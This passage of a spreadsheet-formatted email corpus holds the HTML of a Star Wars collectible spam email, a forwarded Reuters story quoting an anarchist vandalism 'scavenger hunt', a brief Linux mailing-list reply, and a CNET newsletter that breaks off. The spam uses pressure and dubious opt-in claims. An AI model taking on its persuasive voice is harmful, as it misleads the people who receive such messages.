 				&lt;IMG alt="Star Wars" src="http://www.zephers.com/SW/starwars.gif"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan=3 bgcolor=black&gt;
 				&lt;IMG width=600 alt="Empire Strikes Back Logo" src="http://www.zephers.com/SW/EmpStrikesBack.gif"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan=3 align=center&gt;
 				&lt;font size=6&gt;&lt;STRONG&gt;OWN A UNIQUE, ONE-OF-A-KIND PIECE OF STAR-WARS HISTORY!&lt;STRONG&gt;&lt;/font&gt;&lt;br&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr  align="center"&gt;
 			&lt;td&gt;
 				&lt;IMG width=80 height=60 alt="Willitts Logo" src="http://www.zephers.com/SW/WillittsLogo.jpg"&gt;
 			&lt;/td&gt;
 			&lt;td align=center&gt;
 				&lt;font size=5 color=Firebrick&gt;Exclusively Licensed From&lt;br&gt;Lucas Film Ltd.&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;IMG width=80 height=60 alt="Willitts Logo" src="http://www.zephers.com/SW/WillittsLogo.jpg"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr  align="center"&gt;
 			&lt;td colspan=3 &gt;
 				This Innovative New Collectible is the First to Display an Authentic One of Kind 70mm Film Frame From
 				 the &lt;font color=Firebrick&gt;Star Wars/Empire Strikes Back Movie&lt;/font&gt;&lt;br&gt;
 				 containing a One of a Kind 70mm Frame in a 7-1/2" x 2-3/4" Diamond Cut, Acrylic,
 				 &lt;br&gt;Mint Collector's Case.
 				 &lt;BR&gt;&lt;br&gt;
 				 &lt;font size=5&gt;&lt;STRONG&gt;FACT: NO TWO FRAMES ARE ALIKE&lt;/STRONG&gt;&lt;/font&gt;&lt;br&gt;
 				 &lt;font size=4&gt;Each Film Frame Is A Unique Original and Will Never Be Reproduced.&lt;/font&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan=3&gt;
 				Each fully licensed original film frame is sealed and individually serial numbered with identification codes
 				tamper proof holographic seals to prevent fraudulent duplication.
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan=3&gt;
 				&lt;br&gt;
 				&lt;IMG alt="Empire Strikes Back Light Saber Duel" src="http://www.zephers.com/SW/ESBLightSaberDuel.jpg"&gt;
 				&lt;br&gt;
 				&lt;b&gt;#50049 LIGHTSABER DUEL Special Edition:&lt;/b&gt;&lt;BR&gt;
 				Features the fantastic lightsaber duel between Luke Skywalker and Darth Vader.
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan=3&gt;
 				This Special Edition #50049 LIGHTSABER DUEL was only available with the Willitts premium package #50707, 
 				which sold in retail shops for $125.00.
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan=3&gt;
 				&lt;br&gt;
 				&lt;center&gt;&lt;font size=5&gt;Special, Internet offer!&lt;br&gt;
 				Order now and receive the above &lt;br&gt;Rare Special Edition #50049 LIGHTSABER DUEL&lt;br&gt;
 				&lt;strong&gt;for this Special Internet price of only &lt;font color=Firebrick&gt;$19.95!&lt;/font&gt;&lt;/strong&gt;
 				&lt;br&gt;
 				&lt;font color=Firebrick&gt;Special Bonus&lt;/font&gt; &lt;font color="green"&gt;with your order, you will receive
 				  10 Original 1980 Topps Star Wars/Empire Strikes Back Collector Cards &lt;/font&gt;&lt;font color=Firebrick&gt;
 				  Absultely Free!&lt;/font&gt;
 				&lt;/font&gt;&lt;br&gt;
 				These are Original 1980 Topps Star Wars/Empire Strikes Back Collector Cards
 				&lt;br&gt;from 22 years ago! Not reprints!
 				&lt;br&gt;
 				&lt;br&gt;HURRY! Please, respond now before our limited supplies are exhausted!!
 				&lt;br&gt;Your film cell image may differ from the above sample.
 				&lt;/center&gt;
 				&lt;a href="http://www.zephers.com/SW/default.asp?e=jm@netnoteinc.com"&gt;Click here!&lt;/a&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan=3&gt;
 				&lt;br&gt;&lt;br&gt;&lt;hr&gt;&lt;br&gt;
 				You have received this email as an opted-in subscriber, if this is not the case, please click on the following link
 				 to be permanently removed from our database.
 				&lt;a href="mailto:swdelete@nouce1.com"&gt;Please take me off this list&lt;/a&gt;
 				&lt;br&gt;&lt;br&gt;866-667-5399&lt;br&gt;NOUCE 1&lt;br&gt;6822 22nd Avenue North&lt;br&gt;Saint Petersburg, FL 33710-3918&lt;br&gt;&lt;/FONT&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 ------=_NextPart_434_2562770446087
 Content-Type: text/html;
 	charset=us-ascii
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;META NAME="GENERATOR" Content="Microsoft Developer Studio"&gt;
 &lt;META HTTP-EQUIV="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;TITLE&gt;Document Title&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 	&lt;table width=600 align="center" cellspacing=0 cellpadding=0&gt;
 		&lt;tr align="center"&gt;
 			&lt;td colspan=3 bgcolor=black&gt;
 				&lt;IMG alt="Star Wars" src="http://www.zephers.com/SW/starwars.gif"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan=3 bgcolor=black&gt;
 				&lt;IMG width=600 alt="Empire Strikes Back Logo" src="http://www.zephers.com/SW/EmpStrikesBack.gif"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan=3 align=center&gt;
 				&lt;font size=6&gt;&lt;STRONG&gt;OWN A UNIQUE, ONE-OF-A-KIND PIECE OF STAR-WARS HISTORY!&lt;STRONG&gt;&lt;/font&gt;&lt;br&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr  align="center"&gt;
 			&lt;td&gt;
 				&lt;IMG width=80 height=60 alt="Willitts Logo" src="http://www.zephers.com/SW/WillittsLogo.jpg"&gt;
 			&lt;/td&gt;
 			&lt;td align=center&gt;
 				&lt;font size=5 color=Firebrick&gt;Exclusively Licensed From&lt;br&gt;Lucas Film Ltd.&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;IMG width=80 height=60 alt="Willitts Logo" src="http://www.zephers.com/SW/WillittsLogo.jpg"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr  align="center"&gt;
 			&lt;td colspan=3 &gt;
 				This Innovative New Collectible is the First to Display an Authentic One of Kind 70mm Film Frame From
 				 the &lt;font color=Firebrick&gt;Star Wars/Empire Strikes Back Movie&lt;/font&gt;&lt;br&gt;
 				 containing a One of a Kind 70mm Frame in a 7-1/2" x 2-3/4" Diamond Cut, Acrylic,
 				 &lt;br&gt;Mint Collector's Case.
 				 &lt;BR&gt;&lt;br&gt;
 				 &lt;font size=5&gt;&lt;STRONG&gt;FACT: NO TWO FRAMES ARE ALIKE&lt;/STRONG&gt;&lt;/font&gt;&lt;br&gt;
 				 &lt;font size=4&gt;Each Film Frame Is A Unique Original and Will Never Be Reproduced.&lt;/font&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan=3&gt;
 				Each fully licensed original film frame is sealed and individually serial numbered with identification codes
 				tamper proof holographic seals to prevent fraudulent duplication.
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan=3&gt;
 				&lt;br&gt;
 				&lt;IMG alt="Empire Strikes Back Light Saber Duel" src="http://www.zephers.com/SW/ESBLightSaberDuel.jpg"&gt;
 				&lt;br&gt;
 				&lt;b&gt;#50049 LIGHTSABER DUEL Special Edition:&lt;/b&gt;&lt;BR&gt;
 				Features the fantastic lightsaber duel between Luke Skywalker and Darth Vader.
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan=3&gt;
 				This Special Edition #50049 LIGHTSABER DUEL was only available with the Willitts premium package #50707, 
 				which sold in retail shops for $125.00.
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan=3&gt;
 				&lt;br&gt;
 				&lt;center&gt;&lt;font size=5&gt;Special, Internet offer!&lt;br&gt;
 				Order now and receive the above &lt;br&gt;Rare Special Edition #50049 LIGHTSABER DUEL&lt;br&gt;
 				&lt;strong&gt;for this Special Internet price of only &lt;font color=Firebrick&gt;$19.95!&lt;/font&gt;&lt;/strong&gt;
 				&lt;br&gt;
 				&lt;font color=Firebrick&gt;Special Bonus&lt;/font&gt; &lt;font color="green"&gt;with your order, you will receive
 				  10 Original 1980 Topps Star Wars/Empire Strikes Back Collector Cards &lt;/font&gt;&lt;font color=Firebrick&gt;
 				  Absultely Free!&lt;/font&gt;
 				&lt;/font&gt;&lt;br&gt;
 				These are Original 1980 Topps Star Wars/Empire Strikes Back Collector Cards
 				&lt;br&gt;from 22 years ago! Not reprints!
 				&lt;br&gt;
 				&lt;br&gt;HURRY! Please, respond now before our limited supplies are exhausted!!
 				&lt;br&gt;Your film cell image may differ from the above sample.
 				&lt;/center&gt;
 				&lt;a href="http://www.zephers.com/SW/default.asp?e=jm@netnoteinc.com"&gt;Click here!&lt;/a&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td colspan=3&gt;
 				&lt;br&gt;&lt;br&gt;&lt;hr&gt;&lt;br&gt;
 				You have received this email as an opted-in subscriber, if this is not the case, please click on the following link
 				 to be permanently removed from our database.
 				&lt;a href="mailto:swdelete@nouce1.com"&gt;Please take me off this list&lt;/a&gt;
 				&lt;br&gt;&lt;br&gt;866-667-5399&lt;br&gt;NOUCE 1&lt;br&gt;6822 22nd Avenue North&lt;br&gt;Saint Petersburg, FL 33710-3918&lt;br&gt;&lt;/FONT&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 ------=_NextPart_434_2562770446087--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Anarchist 'Scavenger Hunt' Raises D.C. Police Ire (fwd)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 [Destined to be a new reality TV Show?]
 Anarchist 'Scavenger Hunt' Raises D.C. Police Ire
 Sat Sep 21, 3:37 PM ET
 WASHINGTON (Reuters) - An online "anarchist scavenger
 hunt" proposed for next week's annual meeting of the
 International Monetary Fund ( news - web sites) and
 World Bank ( news - web sites) here has raised the ire
 of police, who fear demonstrators could damage
 property and wreak havoc.
 Break a McDonald's window, get 300 points. Puncture a
 Washington D.C. police car tire to win 75 points.
 Score 400 points for a pie in the face of a corporate
 executive or World Bank delegate.
 D.C. Assistant Police Chief Terrance Gainer told a
 congressional hearing on Friday that law authorities
 were in talks to decide whether planned protests were,
 "so deleterious to security efforts that we ought to
 take proactive action."
 Several thousand people are expected to demonstrate
 outside the IMF and World Bank headquarters next
 weekend.
 The Anti-Capitalist Convergence, a D.C.-based
 anarchist group, is also planning a day-long traffic
 blockade, banner-drops and protests against major
 corporations in the downtown core.
 Chuck, the 37 year-old webmaster of the anarchist site
 www.infoshop.org who declined to give his last name,
 told Reuters his scavenger hunt was meant as a joke.
 "People were asking for things to do when they come to
 D.C. We made the list to get people thinking, so they
 don't do the boring, standard stuff," he said. "I
 doubt people will actually keep track of what they do
 for points."
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 31, 2002 at 12:02:01PM +0100, Satelle, StevenX mentioned:
 &gt; I dislike being forced to learn something and mostly refuse to do it. 
  Did you burn yourself often, as a child ?
 John
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Four free e-mailers reviewed, Get the gear you need to burn DVDs
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Software Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;Software&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;a href="top"&gt;&lt;/a&gt;
 &lt;div align="center"&gt;
 &lt;!-- DO NOT REMOVE OR ADJUST ANY CODE ABOVE THIS MARK --&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
         &lt;td width=442 colspan=4&gt;
                 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/sw/hd.gif" width="442" height="60" border="0" alt="CNET Software Newsletter"&gt;&lt;br&gt;
                         &lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
                                 &lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
                                 &lt;tr&gt;
                                         &lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                                         &lt;td width=10 rowspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                                         &lt;td  width=430&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                                 &lt;/tr&gt;
                                 &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;        
         &lt;/td&gt;
 &lt;td width=160 rowspan=2&gt;
 &lt;!-- ad --&gt;
 &lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=09-joDSIj88OkFs6dYLYSS7ZMgtY8cR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/GoDaddy.gif.domainnames.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /end ad --&gt;
                                 &amp;nbsp;&lt;br&gt;
 				&lt;!-- TOP DOWNLOADS --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_TOPdwnlds.gif" alt="Top Downloads" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="150" border=0 cellpadding=2 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58wtiHXvAh1xmYgHobjqmZR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td width="100%25"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcd8ldq3QUj3_tvVyn4IcgdR" &gt;Mozilla 1.0&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpSm4UtngNVX4RVXFO5JSrR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=5e-ssGdIn0656yzMeRhsnStcVTQzciR" &gt;mIRC 6.02&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBBtE5rttiOT8UEE0WNrUZlR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=88-ec5PQQKxb5HfGXk-rU358atSBb9R" &gt;PolyView 3.8&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=9d-kkCWQv0uetRIoRsuKLvd75wKZzuR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=b2-M4pwQX0aTFWfzOAjM2cmpxUCPusR" &gt;FruitMenu 2.0 (for the Mac)&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				&lt;!-- /TOP DOWNLOADS --&gt;
 				 &lt;br&gt;
 				&lt;!-- EDITORS' CHOICE --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_EdCHOICE.gif" alt="Editors' Choice" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="100%25" border=0 cellpadding=3 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- hardware --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=c7-KG43QLPWurnsBnANWtUoF24wxeZR" &gt;Dell Latitude C510/C610 series&lt;/a&gt;&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWdTbwg_vpGZP85eXsJh-uR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Hardware&lt;/font&gt;
 &lt;!-- /hardware --&gt;	
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- electronics --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWqr23OW70pvVdi5Z7edsR" &gt;Toshiba Pocket PC e310&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rqvUaghmEiqzUbrvLkiDZR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Electronics&lt;/font&gt;
 &lt;!-- /electronics --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- software --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFr4T82lglbn9kgGa2oXqGdR" &gt;AutoCAD LT 2002&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsVaYB70lyLxjkqVAXXbcR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Software&lt;/font&gt;
 &lt;!-- /software --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- wireless --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=46-19zwInpD4HqQ8Rha1cN0535V0YiR" &gt;Sony Ericsson T68&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDBhFvY1jxCjjvDSwizzlR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Wireless&lt;/font&gt;
 &lt;!-- /wireless --&gt;				
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				 &lt;br&gt;
 				&lt;!-- /EDITORS' CHOICE --&gt;
         &lt;/td&gt;
         &lt;td width=9 rowspan=2&gt;
                 &lt;img src="http://www.cnet.com/i/dp/dd_c.gif" width="9" height="60" border="0"&gt;&lt;br&gt;
                 &lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
                         &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
                         &lt;tr&gt;&lt;td bgcolor="#ffccoo"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
                         &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;                
         &lt;/td&gt;
         &lt;td width=1 bgcolor="#000000" rowspan=2&gt;
                 &lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
                         &lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;                
         &lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- promo section --&gt;
 &lt;tr valign=top&gt;
         &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
         &lt;td width=10 bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
         &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
         &lt;td width=430 bgcolor="#ffffff"&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#ffffef"&gt;
                         &lt;tr valign=top&gt;
                         &lt;td width=10&gt;&lt;img src="http://www.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td width=412&gt;
                         &lt;img src="http://www.cnet.com/b.gif" width="1" height="3" border="0"&gt;&lt;br&gt;
                         &lt;img src="http://www.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 15, 2002&lt;/font&gt;&lt;br&gt;
                         &lt;img src="http://www.cnet.com/b.gif" width="1" height="3" border="0"&gt;&lt;br&gt;
                                 &lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
                                 &lt;tr valign=top&gt;
                                         &lt;td width=76 align=right&gt;
                                                 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/sw/lindseyt.gif" width=66 height=86&gt;&lt;br&gt;
                                                 &lt;font face="arial, helvetica" size="-2" color="#666666"&gt;
                                                 --&lt;A HREF="mailto:software_mailbag@cnet.com"&gt;Lindsey Turrentine&lt;/A&gt;&lt;br&gt;
                                                 Senior editor&lt;br&gt;
                                                 CNET Software and Internet&lt;br&gt;
                                                 &lt;/font&gt;
                                         &lt;/td&gt;
                                         &lt;td width=10&gt;&amp;nbsp;&lt;/td&gt;
                                         &lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
                                                 &lt;font color="#333333"&gt;&lt;B&gt;Dear Readers,&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 &lt;font size="-1"&gt;If the best things in life are free, why does software cost so
 much? Back in the day (that day being 1999, when the Internet was
 the Next Big Thing), you could get almost all of your
 software--e-mail, fax services, online desktops, you name it--for
 free. Now, even &lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZcoNyxIRpqwuBXvl3NU2rR" &gt;Yahoo&lt;/a&gt; is charging for some of its formerly free mail services, including the ability to check your Yahoo mail from Outlook or another desktop e-mail client.
 But if you look closely enough, you can still find some
 worthwhile free apps. We've reviewed &lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJoJ4geBdLSjaeTldfVpfRR" &gt;four free e-mailers&lt;/a&gt; to get you started. And we've also
 taken a peek at the new &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIo_AW0ILZ0dAVJ9PZAKTFR" &gt;BearShare&lt;/a&gt;, which is not only
 free itself, but also lets you share music and media files at no
 cost. Of course, whether you can find legal music to share is
 another matter entirely.
 &lt;br&gt;&lt;/font&gt;
                                                 &amp;nbsp;&lt;br&gt;
                                         &lt;/td&gt;
                              &lt;/tr&gt;
                                 &lt;/table&gt;
                         &lt;/td&gt;
                         &lt;td width=8&gt;&lt;img src="http://www.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;/table&gt;
         &lt;!-- bottom rule --&gt;
         &lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
         &lt;tr valign=top&gt;
                 &lt;td bgcolor="#F7D69C"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;/table&gt;
 &lt;table border="0" width="100%" cellpadding="10" cellspacing="0"&gt;&lt;tr&gt;&lt;td&gt;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href="http://clickthru.online.com/Click?q=b0-NZmfQQJrcJ4Ye__dxQMKtNX8PQ9R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/050202chipart.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaAxrWAY6zSROUJEymxquR" &gt;&lt;b&gt;Intel's new insides: one size fits all?&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;The i845 chipset's many flavors are faster, better, and a lot more confusing. Read before you shop.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUPq24Hl99bbjsMVKpv3DxsR" &gt;Dell's prefab PC&lt;/a&gt;&lt;br /&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkH9Zwv1NEqBxDVAmoBamZR" &gt;Apple cracks 1GHz&lt;/a&gt;&lt;br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popular&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="5" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;Desktops&lt;/b&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	1. &lt;a href="http://clickthru.online.com/Click?q=05-gDULIG8W7tfWN3RfnODtxI8fiiuR" &gt;Dell Dimension 8000 series&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	2. &lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXHbC-1YxNd5q0_HZB17WsR" &gt;HP Pavilion 950 &lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
